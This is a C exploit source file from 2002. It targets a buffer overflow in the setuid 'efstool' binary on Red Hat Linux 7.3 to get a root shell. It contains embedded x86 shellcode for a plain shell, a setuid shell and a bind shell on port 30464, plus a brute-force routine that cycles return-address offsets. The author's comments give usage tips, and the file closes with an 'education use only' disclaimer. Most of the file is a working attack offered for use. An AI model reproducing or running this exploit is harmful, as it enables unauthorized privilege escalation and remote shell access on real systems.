/* ohMy-another-efs.c */ 

/*******************************************************/ 
/* greetings! this is my very first ever exploit */ 
/* so i hope everyone enjoys it. since there have */ 
/* been a few other efstool exploits, i figured */ 
/* i should seperate myself from the crowd; there */ 
/* are a few differences between my exploit and the */ 
/* others, namely mine works, and others do not. :-) */ 
/* also, mine includes a bruteforce option and is */ 
/* endorsed by extraterrestials. ps- really. */ 
/* */ 
/* as i said this is my first released exploit so */ 
/* be merciful of my work. i also want to give */ 
/* proper credit to fides [f1d3s@lineone.net] for */ 
/* writing \"overflows.txt\" to which i owe much */ 
/* knowledge. i\'m not a code thief so if i have */ 
/* forgotten something let me know. oh ya, and i\'m */ 
/* not reponsible for your stupidity. */ 
/* */ 
/* version 0.2 (9.18.02) */ 
/* tested on redhat linux 7.3. */ 
/* */ 
/* -- j0ker [j0ker@daforest.org] */ 
/* september 18, 2002 */ 
/* http://www.daforest.org/~j0ker/index.html */ 

/*******************************************************/ 
/* usage notes: */ 
/* bruteforcing is not perfect. you may find that */ 
/* it needs kick starting with the ctrl-c command */ 
/* (if it gets hung up) or that when it spawns a */ 
/* shell it will not be setuid, if this happens, */ 
/* continually exit the non setuid shell until it */ 
/* spawns root (by typing \"exit\"). if this still */ 
/* doesn\'t work, then someone has probably chmod -s */ 
/* the efstool file. try the experimental shell */ 
/* (os option number 3). try offsets around 1100. */ 

#include <stdlib.h> 
#include <stdio.h> 

#define BUFFERSIZE 3000 

/* globals */ 
int i, offset, os, soff = 0, stoff = 0; 
long esp, ret, *addr_ptr; 
char *buffer, *ptr, *osptr; 

/* shellcode NOT by j0ker */ 
/* shellcode for freebsd (*bsd?) */ 
//char bsdshell[] = \"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\" 
// \"\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x50\\x54\\x53\" 
// \"\\xb0\\x3b\\x50\\xcd\\x80\"; 

/* linux x86 shellcode */ 
char lunixshell[] = \"\\xeb\\x1d\\x5e\\x29\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\x89\\x76\\x08\\xb0\" 
\"\\x0b\\x87\\xf3\\x8d\\x4b\\x08\\x8d\\x53\\x0c\\xcd\\x80\\x29\\xc0\\x40\\xcd\" 
\"\\x80\\xe8\\xde\\xff\\xff\\xff/bin/sh\"; 

/* experimental shellcode, setuid shell */ 
char experimental[] = \"\\x31\\xc0\\xb0\\x17\\x31\\xdb\\xcd\\x80\" 
\"\\x31\\xc0\\x31\\xdb\\xb0\\x27\\xcd\\x80\\x85\\xc0\\x78\\x1e\\xeb\\x0e\\x5e\" 
\"\\x31\\xc0\\x88\\x46\\x07\\x50\\x50\\x56\\xb0\\x3b\\x50\\xcd\\x80\\xe8\\xed\" 
\"\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xeb\\x31\\xeb\\x1a\\x5e\" 
\"\\x31\\xc0\\x88\\x46\\x07\\x8d\\x1e\\x89\\x5e\\x08\\x89\\x46\\x0c\\xb0\\x0b\" 
\"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\xe8\\xe1\\xff\\xff\\xff\" 
\"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x23\\x41\\x41\\x41\\x41\\x42\\x42\\x42\" 
\"\\x42\\x31\\xc0\\xb0\\x01\\xcd\\x80\"; 

/* bind shell to port 30464 (untested) */ 
char bindshell[] = \"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\xb0\\x66\\xb3\\x01\\x51\\xb1\\x06\\x51\" 
\"\\xb1\\x01\\x51\\xb1\\x02\\x51\\x8d\\x0c\\x24\\xcd\\x80\\xb3\\x02\\xb1\\x02\\x31\" 
\"\\xc9\\x51\\x51\\x51\\x80\\xc1\\x77\\x66\\x51\\xb1\\x02\\x66\\x51\\x8d\\x0c\\x24\" 
\"\\xb2\\x10\\x52\\x51\\x50\\x8d\\x0c\\x24\\x89\\xc2\\x31\\xc0\\xb0\\x66\\xcd\\x80\" 
\"\\xb3\\x01\\x53\\x52\\x8d\\x0c\\x24\\x31\\xc0\\xb0\\x66\\x80\\xc3\\x03\\xcd\\x80\" 
\"\\x31\\xc0\\x50\\x50\\x52\\x8d\\x0c\\x24\\xb3\\x05\\xb0\\x66\\xcd\\x80\\x89\\xc3\" 
\"\\x31\\xc9\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x41\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x41\" 
\"\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x31\\xdb\\x53\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\" 
\"\\x2f\\x62\\x69\\x89\\xe3\\x8d\\x54\\x24\\x08\\x31\\xc9\\x51\\x53\\x8d\\x0c\\x24\" 
\"\\x31\\xc0\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\"; 

unsigned long sp(void) 
{ 
__asm__(\"movl %esp, %eax\"); 
} 

void usage(char *cmd) 
{ 
printf(\" my first exploit - efstool - j0ker@daforest.org\\n\"); 
printf(\" usage: %s <offset> <os>\\n\", cmd); 
printf(\" os types are: 1. linux x86 *untested*\\n\"); 
printf(\" 2. experimental x86\\n\"); 
printf(\" 3. bind shell to port 30464 x86 *untested*\\n\"); 
printf(\" use -1 offset for bruteforce\\n\"); 
printf(\" usage: %s -1 <os> <start offset> <stop offset>\\n\", cmd); 
} 

void doExploit() 
{ 
printf(\" my first exploit - efstool - j0ker@daforest.org\\n\"); 
printf(\" stack pointer .. 0x%x\\n\", esp); 
printf(\" offset ......... 0x%x\\n\", offset); 
printf(\" return addr .... 0x%x\\n\", ret); 

if(!(buffer = malloc(BUFFERSIZE))) 
{ 
printf(\" !!! error: couldn\'t allocate memory !!!\\n\"); 
exit(-1); 
} 

ptr = buffer; 
addr_ptr = (long *)ptr; 
for(i=0; i<BUFFERSIZE; i+=4) 
*(addr_ptr++) = ret; 

for(i=0; i<BUFFERSIZE/2; i++) 
buffer[i] = \'\\x90\'; 

if (os == 1) 
{ 
ptr = buffer + ((BUFFERSIZE/2) - (strlen(lunixshell)/2)); 
for(i=0; i<strlen(lunixshell); i++) 
*(ptr++) = lunixshell[i]; 
} else if (os == 2) { 
ptr = buffer + ((BUFFERSIZE/2) - (strlen(experimental)/2)); 
for(i=0; i<strlen(experimental); i++) 
*(ptr++) = experimental[i]; 
} else { 
ptr = buffer + ((BUFFERSIZE/2) - (strlen(bindshell)/2)); 
for(i=0; i<strlen(bindshell); i++) 
*(ptr++) = bindshell[i]; 
} 

buffer[BUFFERSIZE-1] = 0; 

/* this seems to work ok, but i\'ve never seen it done before */ 
/* i had to do this for bruteforce (i\'m a new programmer) */ 
//execl(\"/usr/bin/efstool\", \"efstool\", buffer, 0); 
setenv(\"j0ker\", buffer, 1); 
system(\"/usr/bin/efstool $j0ker\"); 

printf(\"\\n\"); 
} 

int main(int argc, char *argv[]) 
{ 
if (argc<3) 
{ 
usage(argv[0]); 
printf(\" !!! error: no offset specified !!!\\n\"); 
return(1); 
} 

if (atoi(argv[1]) == -1 && argc < 5) 
{ 
usage(argv[0]); 
printf(\" !!! error: no start/stop offset specified !!!\\n\"); 
return(1); 
} 

offset = atoi(argv[1]); 
esp = sp(); 
ret = esp-offset; 
os = atoi(argv[2]); 

if (offset == -1) 
{ 
soff = atoi(argv[3]); 
stoff = atoi(argv[4]); 
} 

if (os < 1 || os > 3) 
{ 
usage(argv[0]); 
printf(\" !!! error: invalid operating system identification !!!\\n\"); 
return(1); 
} 

if (offset == -1) 
{ 
offset = soff; 
for (offset; offset <= stoff; offset++) 
{ 
ret = esp-offset; 
system(\"clear\"); 
doExploit(); 
} 
} else { doExploit(); } 

return 0; 
} 
/* THIS IS (C) COPYRIGHT 2002 J0KER, NOT YOU SO HANDS OFF */ 
/* I AM NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS */ 
/* FILE AS IT IS FOR EDUCATION USE ONLY. */ 

/* eof */